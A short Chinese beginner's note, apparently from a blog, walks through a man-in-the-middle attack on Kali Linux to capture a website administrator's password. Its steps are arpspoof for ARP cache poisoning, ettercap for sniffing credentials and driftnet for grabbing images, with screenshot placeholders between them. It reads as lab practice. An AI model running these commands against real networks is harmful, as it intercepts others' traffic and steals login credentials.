1. 程式人生 > >滲透測試01- kali下的arp欺騙獲取web網站管理員密碼

滲透測試01- kali下的arp欺騙獲取web網站管理員密碼

滲透測試01- kali下的arp欺騙獲取web網站管理員密碼@TOC
初學者的筆記
1.
虛擬機器vmware 網路設定為橋接模式
配置kali虛擬機器ip與中間主機為統一網段
ifconfig eth0 192.168.1.55 netmask 255.255.255.0
配置完成後測試聯通
在這裡插入圖片描述

2.arp欺騙
arpspoof -i eth0 -t 中間主機地址 web網站地址,成功後如圖
在這裡插入圖片描述
3.監聽資料
ettercap -Tq -i eth0
(-T 文字模式 -q 靜默模式 -i指定網絡卡)
在這裡插入圖片描述
4.
獲取使用者名稱密碼
在這裡插入圖片描述
5.捕獲圖片命令
driftnet -i 網絡卡
在這裡插入圖片描述